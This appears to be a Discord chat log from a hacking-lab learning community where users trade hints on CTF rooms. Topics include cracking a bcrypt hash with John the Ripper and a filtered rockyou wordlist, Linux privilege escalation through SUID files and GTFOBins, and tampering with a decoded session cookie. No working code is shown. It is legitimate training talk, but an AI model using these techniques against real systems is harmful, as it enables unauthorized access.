@outer meteor http://web.engr.oregonstate.edu/~mjb/cs475/DoIHaveOpenCL.pdf

Is it inside the directory you already found?

Also, delete the name of it as it's an answer

@outer meteor Updating stuff isn't going to make it any faster. The 940MX is a slow card. Download john, use that.

the other guy tried john and didn't work

i tried it too

"didn't work" what do you mean?

it takes to long

on both

It will be slow

Filter the wordlist, use john

I'm not gonna leave it 31 days until it finishes

It won't take 31 days

But filter the wordlist and use john and it'll get it pretty quick.

and i can use the john in linux or in windows?

Either, but windows will be faster

You can turn the VM off

ok

any tips on filtering rockyou.txt

didn't find any online recourse on that

I gave you some

pw-inspector on kali

Or some regex

let me run pw-inspector

what do i do now?

So did you filter rockyou down to 4 chars to form a new wordlist?

4char only passwords

idk what the command is xD

You need to learn to do some research

watched a video on that

Learn to use manpages and built in help as well as google

why can't i drag the new rockyou.txt to my downloads on windows

you're dragging from a VM into not a VM

You have to enable it

thx

done

now i need john

wich one?

I'm not going to answer that

the big one right

ahaha

They're the same files

downloaded the big boi file

You could have downloaded the smaller one if you had 7zip...

actually i have 7zip

i must be blind

i'ts running

how do i see speed

?

Look in the window.

There's a message

holly shit

it was fast this time

ahahah

It's running on the CPU

Bad GPU < mediocre CPU for bcrypt

thx for the help

and now that i know how to filter it's faster

That's not what made it faster

Running it on CPU made it faster

Filtering the wordlist means you can find it with less guesses

and it's faster

It's faster because you're not using a terrible GPU

xD

do u know where is the password cracked file?

@outer meteor Rule 13.

doesn't exist here

It exists everywhere.

Google it.

lol

it's still a little bit slow

nvm

it's fast AF

it took like 2 min

room learn linux task 33 i made a directory called test and inside it i did put a test1234 file yet even trying to find for the whole system with find /* i cannot get hold of shiba4 did i mess up somewhere?

@quartz furnace yes

find /* doesn't work properly

ohhh

/* is interpreted in bash

mhhh not too sure what that means

okay but at least i understood what im doing wrong so thanks 🙂

Hi guys, I am playing on "Geolocating Images" room and getting no clues about Task 6. I have recognized the monument on the back and think I got the overall location on a map but do not know how to advance, any nudge for me?

google maps and think about what direction you’re looking

Well no direction on image 3. Looks like an observatory but no luck with it

|| you are going well, very well||

||also try to watch around, what are in the image in the background? whats the geology of that image?||

there is 2 things very very very symbolic from that place and you can find it really fast (at least the place where it is)

room learn linux task 43 meaning the last one im stuck eyeing a readme file yet i don't have permission to read the thing any tips to get around that? tryed to use chown and also chmod without success

@quartz furnace You need to get root to get the root flag

well i though maybe i had to look up the password to root first to then be able to access the flag

If you could just look up root passwords, hacking would be a lot easier

so im like can't find a way to change the root directory

No

You need to become root

yeah how do i do that if i need the root access to change user group

Wat

to change user group to root right

What.

I don't understand what you mean at all

nvm

already tryed switching to shiba1 which's in the root group yet got no access to the folder so i dunno lol

I don't think you quite understand

actually now that im looking at it ur right only user can access the folder

so any tips to become root without a password?

That, uh

Is an entire branch of exploitation

well i just begun so i have nooooooooooo idea

The room teaches you how to run commands as root, right?

@stuck fractal yeah so?

Well, shiba1-4 don't have sudo. But there's more. Maybe look for files belonging to each and every user.

okay

i guess im giving up lol machine finished deploy time 1 hour blew past

You can extend them

And for that machine, the passwords act as checkpoints so you can redeploy and pick up

y i kn but it's so frustrating not finding a single clue >.>

It's harder than the rest of the room, but easier than most of the challenges here

yikes

im in for a beating then if i want to learn from the upcoming rooms

Privilege escalation is something you learn

"Privilege escalation"well that's all i needed to hear

Using tools and scripts ain't gonna work for this one

aaaaaa

tryed looking btw all shiba noot directories so far ican't come up with anything any more hints?

recovery-mode/options/root. im i on the right track for task 43?

@graceful nacelle In learn linux? No

https://tenor.com/view/amanda-mood-sad-thinking-gif-13525260

Look for files belonging to each and every user

hmm thank you

@stuck fractal okay thats intresting. why did a new path appear aftetr i did that but not when i went through every single user?

I have absolutely 0 idea what you mean.

lol thats good. you guys do an amzing job. thank you

The trick for Linux walk through's last flag is to add a user to sudoers right?

Not at all

You can't add a user to the sudoers unless you're root, can you?

Or if you're in sudoers already

Hmm I see

I feel that's misleading @keen zealot

You can be in sudoers and be able to run sudo and not have root perms

True

@torpid geode Look for files belonging to each and every user. And I do mean each and every, not just shibas

OK i'll try that

anyone here who can give me a hint on Tempus Fugit Durius? I got shell and found the file with the credentials but now i'm stuck

ok I give up

I've been trying for 2 hours +

Damn

is it related with .sudo_as_admin_successful?

Not really?

damn

anyone give me a hint for privs esc on room ConvertMyVideo ?

@sick sun I can't give you anything specific but this is all you're likely to need https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology and Resources/Linux - Privilege Escalation.md

thanks man i try it

Any hints for flag2 of /room/tempusfugitdurius

can anyone help me with intro to python challenge

what is your question?

can i dmm u

you can ask here right?

ok

then

i have my code which run perfectly

but gives me a result of ' 'this only

which task are you on?

to encode a code

5 times base64

5times base 32

this is my code

dont know whats the prob

ok, pls remove that or mark it as spoiler

yup

help me

try making a counter that prints i in range(0,5)

see what it prints

i actually did it

when i print data after the first loop

the result is ' '

you also have an else without if

you just need 3 for loops

we can use else right after for

no else

else is only if you use an if statement

no no we can use else after any loop i read it and also tested it

when the for loop ends it continues to the next statement on its own

actually

alrighty

when i decode my code from base 64 1 time it gives me

weird text

on 2 time the result become as ' '

lots of /xdf}/xdf7/

like on firt iteration

Hi. Im doing the room "Intro to x86-64" of reverse engineering and i'm stacked on crackme1 file. Do you know how to find correct password ? I added break point to first compare function, but in buffer of var_4ch variable is something wrong.
im using r2 disassembler

@static rampart try to declare data first: data = ""

then use it

@static rampart also, you going the wrong direction

if you look in the file, thats not b64 data

thats b16 data

Where would a HTTP Auth (basic auth) users creds be stored?
@proven bridge thanks for the hint

@spiral stag means

Hello, I am doing the room convertmyvideo I managed to gain a shell on the machine, but I am stuck on the priviledge escalation part I looked into the sudo rights with (sudo -l) there was nothing there I looked into the kernel version and sudo version to see if there is an exploit for their version nothing there. I then looked at the SUID and GUID binaries there was nothing of interest I ran all of the bins that I found suspicious through gtfobins but still no result I am really stuck does anyone have an Idear into what I could look into next? I am out of idears :c

@fossil coyote pm me

hello, imd oing the Advent of Cyber challenge, im at task 6 and i managed to get the cookie, decode it but im stuck, i dont understand how to use that cookie info to acces mcinventory account

and see what he requested

i tryed using the Burp Suite but i cant manage to make it work

i also tried to edit the cookie

or intersepting the data

oh shit i made it

im a god

it took me about 5 hours

that one second of clearness was just beautiful

godam this feels so good

PogChamp nice one @snow drift !

thanksss

can anyone give me a hint please on temple fugit durius

?

@echo thunder what did you find so far ? Give some idea to where you are. Just asking for help out in the blue is a bit difficult to answer.

I feel like a need a nudge on "Tempus Fugit Durius" as well. Been stuck for a really long time now, trying to get flag #2.

@tranquil dagger do you have root?

@tranquil dagger https://gtfobins.github.io/

look at that

No, I don't have root. Been going in circles for what seems like an eternity.

Thanks, will have a look 🙂

so what user do you have now? put in spoiler tags

||benclower||

@tranquil dagger did you try to spawn a new shell?

look for SUID files too

I did that as part of my enum process, but I guess I missed something crucial

Will try again later. Thanks 🙂

How do you specify which shell is used when you login?

can an one help me